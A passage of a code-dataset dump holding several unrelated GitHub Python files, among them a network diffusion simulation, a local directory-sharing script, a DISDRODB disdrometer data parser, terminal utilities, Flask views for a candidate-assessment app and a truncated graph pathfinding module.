copy\n\ndef main():\n G = nx.fast_gnp_random_graph(100, .2, 1, directed=True)\n for (u,v,w) in G.edges(data=True):\n w['weight'] = random.randint(0,1)\n for v in G.nodes():\n var = G.in_degree(v,weight='weight')\n #print(var) #var contains the sum of incoming edge weights\n for u, v, data in G.in_edges(v, data=True):\n #print (u,v,data)\n if(var!=0):\n G[u][v]['weight']=G[u][v]['weight']/var #normalizing weights for incoming edges\n # print (u,v,data) #to check the nomalize weights\n #print(\".................................\")\n # nx.set_node_attributes(G, 'Active', 0) #'Active' attribute is for diffusion or activating a node\n # G.node[1]['Active'] = 1 #Example: node 1 is set to active\n # G.add_edge(1, 2, weight=0.3)#Example: Add edge with weight\n # print(/G.node)\n # print(G.edge)\n nx.draw_networkx(G, pos=None, arrows=True, with_labels=True)\n plt.draw()\n plt.savefig(\"examples.png\")\n # the source nodes that we can activate\n arr = [1, 3, 4, 7, 8, 10, 14, 16, 20, 25, 41, 49]\n # simulation for 1000 rounds\n result = simulation(G, arr, simulationRound=1000);\n print(result);\n\ndef simulation(G, seeds, simulationRound):\n avg = 0;\n for k in range(simulationRound):\n layers = linear_threshold(G,seeds);\n # print(layers)\n # print(len(layers)) #the steps\\\n count = 0\n for i in layers:\n count += len(i)\n # print(len(i),end = ' ') #the size of avtivate node in each diffusion round\n # print(\"\"); #change line\n # print(count) #the total number of activate nodes after all diffusion process\n avg += count;\n k += 1;\n return avg/simulationRound;\n\ndef linear_threshold(G, seeds):\n\n # 
make sure the seeds are in the graph\n for s in seeds:\n if s not in G.nodes():\n raise Exception(\"seed\", s, \"is not in graph\")\n\n # copy the graph\n DG = copy.deepcopy(G)\n\n # init thresholds\n for n in DG.nodes():\n DG.node[n]['threshold'] = random.randint(0,1)\n\n # perform diffusion\n A = copy.deepcopy(seeds)\n # perform diffusion until no more nodes can be activated\n return _diffuse_all(DG, A)\n\ndef _diffuse_all(G, A):\n layer_i_nodes = [ ]\n layer_i_nodes.append([i for i in A])\n while True:\n len_old = len(A)\n A, activated_nodes_of_this_round = _diffuse_one_round(G, A)\n layer_i_nodes.append(activated_nodes_of_this_round)\n if len(A) == len_old:\n break\n return layer_i_nodes\n\n# activate neighbors according to threshold and in-degree weights\ndef _diffuse_one_round(G, A):\n activated_nodes_of_this_round = set()\n for s in A:\n nbs = G.successors(s)\n for nb in nbs:\n if nb in A:\n continue\n active_nb = list(set(G.predecessors(nb)).intersection(set(A)))\n if _influence_sum(G, active_nb, nb) >= G.node[nb]['threshold']:\n activated_nodes_of_this_round.add(nb)\n A.extend(list(activated_nodes_of_this_round))\n return A, list(activated_nodes_of_this_round)\n\n# Calculate the in-degree sum of weights\ndef _influence_sum(G, froms, to):\n influence_sum = 0.0\n for f in froms:\n influence_sum += G[f][to]['weight']\n return influence_sum\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mparvezrashid/linear-threshold-model","sub_path":"linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2626963929","text":"def conta_letras(frase: str, contar=\"vogais\" ):\n aux = frase.split()\n frase = \"\"\n for c in range(len(aux)):\n frase += aux[c]\n resultado = vogais_consoantes(frase)\n if contar == \"vogais\":\n return resultado[0]\n else:\n return resultado[1]\n\n\ndef vogais_consoantes(frase: str):\n vogais = 0\n consoantes = 0\n for c in range(len(frase)):\n if frase[c].isalpha():\n if frase[c].lower() in ['a', 'e','i', 'o', 'u']:\n vogais += 1\n else:\n consoantes += 1\n resultado = [vogais, consoantes]\n return resultado\n","repo_name":"DanielZanad/Exercicios-de-Ciencia-da-computacao","sub_path":"conta_char.py","file_name":"conta_char.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73725524969","text":"#! 
/usr/bin/python3\n\n\n\n#--------------------------------------------------------------------------------------------------\n#DEPENDENCIES #(sudo apt install python3)\n #(pip3 install os)\n #(pip3 install socket)\n #(sudo apt install qrencode)\n#--------------------------------------------------------------------------------------------------- \n \n \n \nimport os #importing the os library (pip3 install os )\nimport socket #importing the socket module which helps us in getting our ip address(pip3 install socket) \n\nprint("Using this program you can browse all your system files and you can share the files")\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname) #this gets the hostname and your device ip address\n\ns="Press the letter B to go to previous directory or Q to exit and H to Host" \nprint("\\033[1m" + s + "\\033[0m") #This line of code prints the string in bold format\nwhile True:\n print("your current working directory is :"+ os.getcwd()) #printing the current working directory\n dir_list=os.listdir()\n #print("The contents in this directory:" + str(dir_list))\n print("There are "+ str(len(dir_list)) +" Elements in this directory") #printing the number of elements in the current working directory\n number=[]\n i=1\n for x in range(len(dir_list)): #creating a list of numbers to assign as keys for the upcoming dictionary\n number.append(i)\n i+=1\n #print(number)\n #print(dir_list) \n dict = {} #initializing the empty dictionary\n for key in number: #this loop combines the list of the numbers and the list of the names of the directories into a single dictionary called dict\n for value in dir_list:\n dict[key] = value\n dir_list.remove(value)\n break \n #print(dict)\n for key, value in dict.items(): #prints the dictionary 'dict' in a formatted way\n print(key, ' : ', value)\n \n a=(input("Enter the number to select:")) #This elif ladder takes input 'a' from the user and performs the following actions\n if a == 'b' or a == 'B': #if the input is 'b' or 'B' then it points to the previous parent directory\n os.chdir(os.path.abspath(os.path.join(os.getcwd(), os.pardir)))\n print("New path ="+ os.getcwd())\n elif a == 'q' or a == 'Q': #if the input is 'q' or 'Q' then the program/loop will be terminated\n break\n elif a == 'h' or a == 'H': #if the input is 'h' or 'H' then the link and its qr code are displayed and the present directory gets hosted\n print("The link is "+ip_address+":8090")\n link="The link is "+ip_address+":8090"\n cmd = "{0} -{1} {2}".format("qrencode -t ASCII ","o qrcode.txt",ip_address)# (sudo apt install qrencode)\n os.system(cmd) \n os.system("cat qrcode.txt")\n os.system("sudo rm qrcode.txt")\n np="{0} {1}".format("cd ",os.getcwd())\n os.system(np)\n os.system("python3 -m http.server 8090")\n \n else: #else if any number is entered the corresponding directory will be opened for further operations\n print(dict.get(int(a)))\n os.chdir(dict.get(int(a))) \n print("New path ="+ os.getcwd())\n","repo_name":"nagarjunags/Fun_projects","sub_path":"Python File sharing/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36640305712","text":"import os\nimport click\nimport time\nimport logging\nimport xarray as xr\nimport numpy as np\n\n# Directory \nfrom disdrodb.io import check_directories\nfrom disdrodb.io import get_campaign_name\nfrom disdrodb.io import 
create_directory_structure\n\n# Metadata \nfrom disdrodb.metadata import read_metadata\nfrom disdrodb.check_standards import check_sensor_name\n\n# IO \nfrom disdrodb.io import get_L0_fpath\nfrom disdrodb.io import get_L1_netcdf_fpath\nfrom disdrodb.io import read_L0_data\n\n# L0_processing\nfrom disdrodb.check_standards import check_L0_column_names\nfrom disdrodb.check_standards import check_L0_standards\nfrom disdrodb.L0_proc import get_file_list\nfrom disdrodb.L0_proc import read_L0_raw_file_list\nfrom disdrodb.L0_proc import write_df_to_parquet\n\n# L1_processing\nfrom disdrodb.L1_proc import create_L1_dataset_from_L0\nfrom disdrodb.L1_proc import write_L1_to_netcdf\nfrom disdrodb.L1_proc import create_L1_summary_statistics\n\n# Logger \nfrom disdrodb.logger import create_logger\nfrom disdrodb.logger import close_logger\n\n\n# -------------------------------------------------------------------------.\n# Click Command Line Interface decorator\n@click.command() # options_metavar=''\n@click.argument('raw_dir', type=click.Path(exists=True), metavar='<raw_dir>')\n@click.argument('processed_dir', metavar='<processed_dir>')\n@click.option('-l0', '--l0_processing', type=bool, show_default=True, default=True, help="Perform L0 processing")\n@click.option('-l1', '--l1_processing', type=bool, show_default=True, default=True, help="Perform L1 processing")\n@click.option('-nc', '--write_netcdf', type=bool, show_default=True, default=True, help="Write L1 netCDF4")\n@click.option('-f', '--force', type=bool, show_default=True, default=False, help="Force overwriting")\n@click.option('-v', '--verbose', type=bool, show_default=True, default=False, help="Verbose")\n@click.option('-d', '--debugging_mode', type=bool, show_default=True, default=False, help="Switch to debugging mode")\n@click.option('-l', '--lazy', type=bool, show_default=True, default=True, help="Use dask if lazy=True")\ndef main(raw_dir,\n         processed_dir,\n         l0_processing=True,\n         l1_processing=True,\n         write_netcdf=True,\n         force=False,\n         verbose=False,\n         debugging_mode=False,\n         lazy=True,\n         ):\n    """Script to process raw data to L0 and L1. \f\n    \n    Parameters\n    ----------\n    raw_dir : str\n        Directory path of raw files for a specific campaign.\n        The path should end with <campaign_name>.\n        Example raw_dir: '<...>/disdrodb/data/raw/<campaign_name>'.\n        The directory must have the following structure:\n        - /data/<station_id>/\n        - /metadata/<station_id>.json \n        For each <station_id> there must be a corresponding JSON file\n        in the metadata subfolder.\n    processed_dir : str\n        Desired directory path for the processed L0 and L1 products. \n        The path should end with <campaign_name> and match the end of raw_dir.\n        Example: '<...>/disdrodb/data/processed/<campaign_name>'.\n    l0_processing : bool\n        Whether to launch processing to generate L0 Apache Parquet file(s) from raw data.\n        The default is True.\n    l1_processing : bool\n        Whether to launch processing to generate L1 netCDF4 file(s) from source netCDF or L0 data. \n        The default is True.\n    write_netcdf: bool \n        Whether to save the L1 dataset as a netCDF4 archive.\n        l1_processing must be True for this to take effect.\n    force : bool\n        If True, overwrite existing data in destination directories. \n        If False, raise an error if there are already data in destination directories. \n        The default is False.\n    verbose : bool\n        Whether to print detailed processing information to the terminal. 
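Log messages are always written to the campaign log file as well.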
\n        The default is False.\n    debugging_mode : bool\n        If True, it reduces the amount of data to process.\n        - For L0 processing, it processes just 3 raw data files.\n        - For L1 processing, it takes a small subset of the Apache Parquet dataframe.\n        The default is False.\n    lazy : bool\n        Whether to perform processing lazily with dask. \n        If lazy=True, it employs dask.array and dask.dataframe.\n        If lazy=False, it employs pandas.DataFrame and numpy.array.\n        The default is True.\n    \n    Additional information:\n    - The campaign name must semantically match between:\n       - The ends of raw_dir and processed_dir paths \n       - The attribute 'campaign' within the metadata JSON file. \n    - The campaign names are set to UPPER CASE. \n       \n    """\n    ####----------------------------------------------------------------------.\n    ###########################\n    #### CUSTOMIZABLE CODE ####\n    ###########################\n    #### - Define raw data headers\n    # Notes\n    # - In all files, the datalogger voltage lacks the delimiter,\n    #   so it needs to be split to obtain datalogger_voltage and rainfall_rate_32bit\n    \n    column_names = ['temp1',\n                    'temp2',\n                    'temp3',\n                    'temp4',\n                    'temp5',\n                    'temp6',\n                    'temp7',\n                    'temp8',\n                    'temp9',\n                    'temp10',\n                    'temp11',\n                    'temp12',\n                    'temp13',\n                    'temp14',\n                    'temp15',\n                    'temp16',\n                    'temp17',\n                    'temp18',\n                    'temp19',\n                    'temp20',\n                    'temp21',\n                    'temp22',\n                    'temp23']\n\n    # - Check name validity\n    check_L0_column_names(column_names)\n\n    ##------------------------------------------------------------------------.\n    #### - Define reader options\n\n    reader_kwargs = {}\n    # - Define delimiter\n    reader_kwargs["delimiter"] = ";"\n\n    # - Avoid the first column becoming the df index !!!\n    reader_kwargs["index_col"] = False\n\n    # - Define behaviour when encountering bad lines\n    reader_kwargs["on_bad_lines"] = "skip"\n\n    # - Define parser engine\n    #   - C engine is faster\n    #   - Python engine is more feature-complete\n    reader_kwargs["engine"] = "python"\n\n    # - Define on-the-fly decompression of on-disk data\n    #   - Available: gzip, bz2, zip\n    reader_kwargs["compression"] = "infer"\n\n    # - Strings to recognize as NA/NaN and replace with standard NA flags\n    #   - Already included: ‘#N/A’, ‘#N/A N/A’, ‘#NA’, ‘-1.#IND’, ‘-1.#QNAN’,\n    #                       ‘-NaN’, ‘-nan’, ‘1.#IND’, ‘1.#QNAN’, ‘<NA>’, ‘N/A’,\n    #                       ‘NA’, ‘NULL’, ‘NaN’, ‘n/a’, ‘nan’, ‘null’\n    reader_kwargs["na_values"] = [\n        "na",\n        "",\n        "error",\n        "NA",\n        "Error in data reading! 0000.000",\n    ]\n\n    # - Define max size of dask dataframe chunks (if lazy=True)\n    #   - If None: use a single block for each file\n    #   - Otherwise: "<size>MB" by which to cut up larger files\n    reader_kwargs["blocksize"] = None # "50MB"\n\n    # Cast all to string\n    reader_kwargs["dtype"] = str\n\n    # Different encoding for this campaign\n    reader_kwargs["encoding"] = "latin-1"\n\n    # Do not use the first row as column names\n    reader_kwargs["header"] = None\n\n    ##------------------------------------------------------------------------.\n    #### - Define facultative dataframe sanitizer function for L0 processing\n    # - Enables handling of bad raw data files\n    # - Enables standardizing raw data files to L0 standards (i.e. 
time to datetime)\n    df_sanitizer_fun = None\n\n    def df_sanitizer_fun(df, lazy=False):\n        # Import dask or pandas \n        if lazy: \n            import dask.dataframe as dd\n        else: \n            import pandas as dd\n        \n        column_names = ['time',\n                        'latitude',\n                        'longitude',\n                        'weather_code_synop_4680',\n                        'weather_code_synop_4677',\n                        'reflectivity_32bit',\n                        'mor_visibility',\n                        'laser_amplitude',\n                        'number_particles',\n                        'sensor_temperature',\n                        'sensor_heating_current',\n                        'sensor_battery_voltage',\n                        'datalogger_error',\n                        'rainfall_amount_absolute_32bit',\n                        'All_0',\n                        'raw_drop_concentration',\n                        'raw_drop_average_velocity',\n                        'raw_drop_number',\n                        ]\n\n        column_names_2 = ['id',\n                        'latitude',\n                        'longitude',\n                        'time',\n                        'all_nan',\n                        'rainfall_rate_32bit',\n                        'rainfall_accumulated_32bit',\n                        'weather_code_synop_4680',\n                        'weather_code_synop_4677',\n                        'reflectivity_32bit',\n                        'mor_visibility',\n                        'laser_amplitude',\n                        'number_particles',\n                        'sensor_temperature',\n                        'sensor_heating_current',\n                        'sensor_battery_voltage',\n                        'All_0',\n                        'rainfall_amount_absolute_32bit',\n                        'datalogger_error',\n                        'raw_drop_concentration',\n                        'raw_drop_average_velocity',\n                        'raw_drop_number',\n                        'End_line'\n                        ]\n        \n        # - Drop all nan in latitude (defined in reader_kwargs['na_values'])\n        df = df[~df.iloc[:,1].isna()]\n        if len(df.index) == 0:\n            df.columns = ['latitude',\n                        'longitude',\n                        'time',\n                        'rainfall_rate_32bit',\n                        'rainfall_accumulated_32bit',\n                        'weather_code_synop_4680',\n                        'weather_code_synop_4677',\n                        'reflectivity_32bit',\n                        'mor_visibility',\n                        'laser_amplitude',\n                        'number_particles',\n                        'sensor_temperature',\n                        'sensor_heating_current',\n                        'sensor_battery_voltage',\n                        'rainfall_amount_absolute_32bit',\n                        'raw_drop_concentration',\n                        'raw_drop_average_velocity',\n                        'raw_drop_number',\n                        ]\n            # df = df.iloc[:,:18]\n            return df\n        \n        # - If the first column is an ID, then it is a different format\n        \n        if lazy:\n            flag = df.iloc[:,0].str.isnumeric().all().compute()\n        else:\n            flag = df.iloc[:,0].str.isnumeric().all()\n        \n        if flag:\n            # - Rename columns\n            df.columns = column_names_2\n            # - Remove the 'OK,' prefix from rainfall_rate_32bit\n            if lazy:\n                df["rainfall_rate_32bit"] = df["rainfall_rate_32bit"].str.replace("OK,","")\n            else:\n                # df['rainfall_rate_32bit'] = df['rainfall_rate_32bit'].str.split(',').str[-1]\n                # - Suppress SettingWithCopyWarning error (A value is trying to be set on a copy of a slice from a DataFrame)\n                dd.options.mode.chained_assignment = None\n                df['rainfall_rate_32bit'] = df['rainfall_rate_32bit'].str.split(',').str[-1]\n            \n            # - Drop useless columns\n            col_to_drop = ["id", "all_nan", "All_0", 'datalogger_error', 'End_line']\n            df = df.drop(columns=col_to_drop)\n            \n            # - Check latitude and longitude\n            df = df.loc[df["latitude"].astype(str).str.len() < 11]\n            df = df.loc[df["longitude"].astype(str).str.len() < 11]\n            \n            # - Convert time column to datetime \n            df['time'] = dd.to_datetime(df['time'], errors='coerce')\n            df = df.dropna()\n            if len(df.index) == 0:\n                for col in col_to_drop:\n                    column_names_2.remove(col)\n                df.columns = column_names_2\n                return df\n            
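# - Now that invalid timestamps are dropped, re-parse with the explicit day-first format\n            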
df['time'] = dd.to_datetime(df['time'], format='%d/%m/%Y %H:%M:%S')\n\n # - Drop columns if nan\n col_to_drop_if_na = ['latitude','longitude','raw_drop_concentration','raw_drop_average_velocity','raw_drop_number']\n df = df.dropna(subset = col_to_drop_if_na)\n \n # - Drop invalid raw_drop_concentration, raw_drop_average_velocity and raw_drop_number\n df = df.loc[df[\"raw_drop_concentration\"].astype(str).str.len() == 224]\n df = df.loc[df[\"raw_drop_average_velocity\"].astype(str).str.len() == 224]\n df = df.loc[df[\"raw_drop_number\"].astype(str).str.len() == 4096]\n \n df = df[df['raw_drop_number'].str.contains('0\\x100') == False]\n \n # - Cast dataframe to dtypes\n from disdrodb.data_encodings import get_L0_dtype_standards\n dtype_dict = get_L0_dtype_standards(sensor_name=sensor_name)\n \n dtype_dict_not_object = {}\n for k, v in dtype_dict.items():\n if v != 'object':\n dtype_dict_not_object[k] = v\n dtype_dict_not_object.pop('time')\n \n for column in df.columns:\n if column in dtype_dict_not_object:\n df[column] = dd.to_numeric(df[column], errors='coerce')\n invalid_rows_index = df.loc[df[column].isna()].index\n if lazy:\n if invalid_rows_index.size.compute() != 0:\n df = df.dropna(subset=[column])\n else:\n if invalid_rows_index.size != 0:\n df = df.dropna(subset=[column])\n # df = df.drop(invalid_rows_index)\n df[column] = df[column].astype(dtype_dict[column])\n\n return df\n\n ##------------------------------------------------------------------------.\n #### - Define glob pattern to search data files in raw_dir/data/\n raw_data_glob_pattern= \"*.log*\"\n\n ####----------------------------------------------------------------------.\n ####################\n #### FIXED CODE ####\n ####################\n # -------------------------------------------------------------------------.\n # Initial directory checks\n raw_dir, processed_dir = check_directories(raw_dir, processed_dir, force=force)\n\n # Retrieve campaign name\n campaign_name = get_campaign_name(raw_dir)\n\n # -------------------------------------------------------------------------.\n # Define logging settings\n create_logger(processed_dir, \"parser_\" + campaign_name)\n # Retrieve logger\n logger = logging.getLogger(campaign_name)\n logger.info(\"### Script started ###\")\n\n # -------------------------------------------------------------------------.\n # Create directory structure\n create_directory_structure(raw_dir, processed_dir)\n\n # -------------------------------------------------------------------------.\n #### Loop over station_id directory and process the files\n list_stations_id = os.listdir(os.path.join(raw_dir, \"data\"))\n\n # station_id = list_stations_id[1]\n for station_id in list_stations_id:\n # ---------------------------------------------------------------------.\n logger.info(f\" - Processing of station_id {station_id} has started\")\n # ---------------------------------------------------------------------.\n # Retrieve metadata\n attrs = read_metadata(raw_dir=raw_dir, station_id=station_id)\n\t\t\n # Retrieve sensor name\n sensor_name = attrs['sensor_name']\n check_sensor_name(sensor_name)\n\n # ---------------------------------------------------------------------.\n #######################\n #### L0 processing ####\n #######################\n if l0_processing:\n # Start L0 processing\n t_i = time.time()\n msg = \" - L0 processing of station_id {} has started.\".format(station_id)\n if verbose:\n print(msg)\n logger.info(msg)\n\n # -----------------------------------------------------------------.\n 
#### - List files to process\n glob_pattern = os.path.join(\"data\", station_id, raw_data_glob_pattern)\n file_list = get_file_list(\n raw_dir=raw_dir,\n glob_pattern=glob_pattern,\n verbose=verbose,\n debugging_mode=debugging_mode,\n )\n \n\n ##------------------------------------------------------.\n #### - Read all raw data files into a dataframe \n df = read_L0_raw_file_list(file_list=file_list,\n column_names=column_names,\n reader_kwargs=reader_kwargs,\n df_sanitizer_fun=df_sanitizer_fun,\n lazy=lazy,\n sensor_name=sensor_name,\n verbose=verbose)\n\n ##------------------------------------------------------.\n #### - Write to Parquet\n fpath = get_L0_fpath(processed_dir, station_id)\n write_df_to_parquet(df=df, fpath=fpath, force=force, verbose=verbose)\n ##------------------------------------------------------.\n #### - Check L0 file respects the DISDRODB standards\n check_L0_standards(fpath=fpath, sensor_name=sensor_name, verbose=verbose)\n ##------------------------------------------------------.\n # End L0 processing\n t_f = time.time() - t_i\n msg = \" - L0 processing of station_id {} ended in {:.2f}s\".format(\n station_id, t_f\n )\n if verbose:\n print(msg)\n logger.info(msg)\n\n ##------------------------------------------------------.\n # Delete temp variables\n del df\n\n # ---------------------------------------------------------------------.\n #######################\n #### L1 processing ####\n #######################\n if l1_processing:\n # Start L1 processing\n t_i = time.time()\n msg = \" - L1 processing of station_id {} has started.\".format(station_id)\n if verbose:\n print(msg)\n logger.info(msg)\n ##----------------------------------------------------------------.\n #### - Read L0\n df = read_L0_data(\n processed_dir,\n station_id,\n lazy=lazy,\n verbose=verbose,\n debugging_mode=debugging_mode,\n )\n\n # -----------------------------------------------------------------.\n #### - Create xarray Dataset\n ds = create_L1_dataset_from_L0(\n df=df, attrs=attrs, lazy=lazy, verbose=verbose\n )\n\n # -----------------------------------------------------------------.\n #### - Write L1 dataset to netCDF4\n if write_netcdf:\n fpath = get_L1_netcdf_fpath(processed_dir, station_id)\n write_L1_to_netcdf(ds, fpath=fpath, sensor_name=sensor_name)\n\n # -----------------------------------------------------------------.\n #### - Compute L1 summary statics\n create_L1_summary_statistics(\n ds,\n processed_dir=processed_dir,\n station_id=station_id,\n sensor_name=sensor_name,\n )\n\n # -----------------------------------------------------------------.\n # End L1 processing\n t_f = time.time() - t_i\n msg = \" - L1 processing of station_id {} ended in {:.2f}s\".format(\n station_id, t_f\n )\n if verbose:\n print(msg)\n print(\" --------------------------------------------------\")\n logger.info(msg)\n\n # -----------------------------------------------------------------.\n # ---------------------------------------------------------------------.\n # -------------------------------------------------------------------------.\n if verbose:\n print(msg)\n logger.info(\"---\")\n logger.info(msg)\n logger.info(\"---\")\n\n msg = \"### Script finish ###\"\n print(msg)\n logger.info(msg)\n\n close_logger(logger)\n\n\nif __name__ == \"__main__\":\n 
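# click parses the command-line arguments and passes them to main()\n    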
main()\n","repo_name":"regislon/disdrodb","sub_path":"disdrodb/readers/EPFL/parser_SAMOYLOV_2017_2019.py","file_name":"parser_SAMOYLOV_2017_2019.py","file_ext":"py","file_size_in_byte":21898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"5048563689","text":"import contextlib\nimport colored\nimport termios\nimport select\nimport tty\nimport sys\nimport re\nimport os\n\n\nCOLOR_NAMES = {\n 'pink': 176,\n 'red': 9,\n 'purple': 69,\n 'blue_green': 43,\n 'light_orange': 173,\n 'light_green': 151,\n 'dark_green': 65,\n 'dark_purple': 60,\n}\n\nANSI_SPECIAL_KEY = '\\x1b'\nANSI_COMMANDS = {\n 'hide_cursor': \"\\x1b[?25l\",\n 'show_cursor': \"\\x1b[?25h\",\n 'get_cursor_position': \"\\x1b[6n\",\n 'clear_lines': '\\x1b[1A\\r\\033[K',\n}\n\nKEYS = {\n '\\r': 'enter',\n '\\x1b\\x5b\\x41': 'arrow_up',\n '\\x1b\\x5b\\x42': 'arrow_down',\n}\n\n\ndef _execute_ansi_command(command_name, *args):\n sys.stdout.write(ANSI_COMMANDS[command_name].format(*args))\n\n\ndef colorize(text, color=251, attrib=None):\n if color in COLOR_NAMES:\n color = COLOR_NAMES[color]\n\n style = colored.fg(color)\n if attrib is not None:\n style += colored.attr(attrib)\n return colored.stylize(text, style, colored.attr('reset'))\n\n\ndef clear_lines(num_of_lines):\n for line in range(num_of_lines):\n _execute_ansi_command('clear_lines')\n\n\ndef get_terminal_size():\n rows, columns = os.popen('stty size', 'r').read().split()\n return int(rows), int(columns)\n\n\ndef clear_text(text):\n _, terminal_columns = get_terminal_size()\n stripped_ansi_text = strip_ansi(text)\n text_lines = stripped_ansi_text.expandtabs().split('\\n')\n lines_to_clear = len(text_lines) - 1\n for line in text_lines:\n lines_to_clear += len(line) / terminal_columns\n clear_lines(lines_to_clear)\n\n\ndef get_cursor_position():\n _execute_ansi_command('get_cursor_position')\n ansi_result = \"\"\n while not ansi_result.endswith(\"R\"):\n ansi_result += getch()\n pos_y, pos_x = re.findall(r\"^\\x1b\\[(\\d*);(\\d*)R\", ansi_result)[0]\n return int(pos_x), int(pos_y)\n\n\ndef strip_ansi(text):\n ansi_escape = re.compile(r'\\x1B(?:[@-Z\\\\-_]|\\[[0-?]*[ -/]*[@-~])')\n stripped_text = ansi_escape.sub('', text)\n return stripped_text\n\n\ndef hide_cursor():\n _execute_ansi_command('hide_cursor')\n\n\ndef show_cursor():\n _execute_ansi_command('show_cursor')\n\n\n@contextlib.contextmanager\ndef hidden_cursor():\n try:\n hide_cursor()\n yield\n finally:\n show_cursor()\n\n\ndef get_keypress():\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n try:\n tty.setraw(sys.stdin.fileno())\n user_key = sys.stdin.read(1)\n if user_key == ANSI_SPECIAL_KEY:\n user_key += sys.stdin.read(2)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n if user_key in KEYS:\n user_key = KEYS[user_key]\n return user_key\n","repo_name":"Shukasa4/yummy","sub_path":"yummy/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7086967679","text":"from flask import Blueprint, render_template, flash, request, redirect, url_for\r\nfrom . 
import db\r\nfrom .models import Note\r\nfrom flask_login import login_required, current_user\r\nimport json\r\nfrom flask import jsonify\r\n\r\nviews = Blueprint('views',__name__)\r\n\r\n@views.route('/', methods=['GET','POST'])\r\n@login_required\r\ndef home():\r\n\treturn render_template("home.html", user=current_user)\r\n\r\n@views.route('/new_log', methods=['GET','POST'])\r\n@login_required\r\ndef new_log():\r\n\tif request.method == "POST":\r\n\t\tc_firstName = request.form.get('c_firstName')\r\n\t\tc_email = request.form.get('c_email')\r\n\t\tc_final_score = request.form.get('c_final_score')\r\n\t\tnote = request.form.get('note')\r\n\t\tc_Comm = request.form.get('c_Comm')\r\n\t\tc_Con = request.form.get('c_Con')\r\n\t\tc_Tech = request.form.get('c_Tech')\r\n\t\tc_Employ = request.form.get('c_Employ')\r\n\r\n\t\tcand = Note.query.filter_by(c_email = c_email).first()\r\n\t\tif cand:\r\n\t\t\tflash("Duplicate candidate entries not allowed!", category='error')\r\n\t\telse:\r\n\t\t\tnew_entry = Note(data=note, c_firstName=c_firstName, c_email = c_email, user_id=current_user.id,\t c_Comm = c_Comm, c_Con=c_Con, c_Tech=c_Tech, c_Employ=c_Employ, c_final_score=c_final_score)\r\n\t\t\tdb.session.add(new_entry)\r\n\t\t\tprint(new_entry)\r\n\t\t\tdb.session.commit()\r\n\t\t\tflash('Candidate Accepted for Assessment', category='Success')\r\n\t\t\treturn redirect(url_for("views.home"))\r\n\t\t\t\r\n\treturn render_template("new_log.html", user = current_user)\r\n\t\r\n\r\n@views.route('/delete-note', methods=['POST'])\r\ndef delete_note():\r\n    note = json.loads(request.data)\r\n    noteId = note['noteId']\r\n    note = Note.query.get(noteId)\r\n    if note:\r\n        if note.user_id == current_user.id:\r\n            db.session.delete(note)\r\n            db.session.commit()\r\n\r\n    return jsonify({})\r\n\r\n@views.route('/displayNote', methods=['GET','POST'])\r\ndef displayNote():\r\n\tnote = json.loads(request.data)\r\n\tnoteId = note['noteId']\r\n\tnote = Note.query.get(noteId)\r\n\t# a bare model instance is not a valid Flask response; return its stored data as JSON\r\n\treturn jsonify({'noteId': noteId, 'data': note.data if note else None})","repo_name":"SamJeosh/hiring-support","sub_path":"Yourself/Yourself/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26500598148","text":"from collections import defaultdict\nimport sys\nfrom src.Heap import Heap\nimport csv\nimport json\nimport re\nfrom src.Node import Node\nfrom math import sqrt\nfrom time import sleep\n\n\ndef initialize_map(filename):\n    f = open(filename)\n    data = json.load(f)\n    nodes = {}\n    map_node = {}\n    for key, node in data.items():\n        temp_node = Node(\n            number=node["Node number"], ## dont change this to -1\n            name=node["Node Name"],\n            x=int(node["x_pos"]),\n            y=int(node["y_pos"]),\n            node_type=node["Type "],\n            floor=int(node["Floor"]),\n            building=node["Building"]\n        )\n        nodes[int(key)-1] = temp_node\n        map_node[node["Node Name"]] = int(node["Node number"])-1\n    return nodes,map_node\n\ndef get_image_mapping(filename):\n    f = open(filename)\n    data = json.load(f)\n    images = {}\n    for key, value in data.items():\n        images[key] = value\n    return images\n\nclass Graph():\n\n    def __init__(self, V, nodes):\n        self.V = V\n        self.graph = defaultdict(list)\n        self.nodes = nodes\n\n    def calculateDistance(self, src, dest):\n        return sqrt(pow(self.nodes[src].x - self.nodes[dest].x, 2)+pow(self.nodes[src].y-self.nodes[dest].y, 2))\n\n    def addEdge(self, src, dest):\n        weight = self.calculateDistance(src, dest)\n        # print(src, dest, weight)\n        newNode = [dest, weight]\n        self.graph[src].insert(0, 
newNode)\n newNode = [src, weight]\n self.graph[dest].insert(0, newNode)\n\n def addAllEdges(self, input_file):\n with open(input_file, 'r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n self.addEdge(int(row['Nodes']), int(row['Adjacents']))\n\n def getPath(self, parent, j, path):\n if parent[j] == -1 :\n return\n self.getPath(parent , parent[j], path)\n # print (j, \"\\t\", self.nodes[j].name)\n path.append(j)\n\n\n def getSolution(self, dist, parent, source, dest):\n # print(\"Vertex \\t\\tDistance from Source\\tPath\")\n path = []\n path.append(source)\n self.getPath(parent, dest, path)\n print()\n return path\n\n def getDirections(self, path, dest):\n directions = []\n directions_text = \"\"\n # print(\"In directions: \", path)\n for i in range(1, len(path)):\n ## case 1: for first node - only parent is considered\n if i==1:\n curr = path[i]\n prev = path[i-1]\n if self.nodes[curr].x > self.nodes[prev].x and self.nodes[curr].y == self.nodes[prev].y:\n directions.append('Right')\n elif self.nodes[curr].x < self.nodes[prev].x and self.nodes[curr].y == self.nodes[prev].y:\n directions.append('Left')\n elif self.nodes[curr].x == self.nodes[prev].x and self.nodes[curr].y > self.nodes[prev].y:\n directions.append('Straight')\n 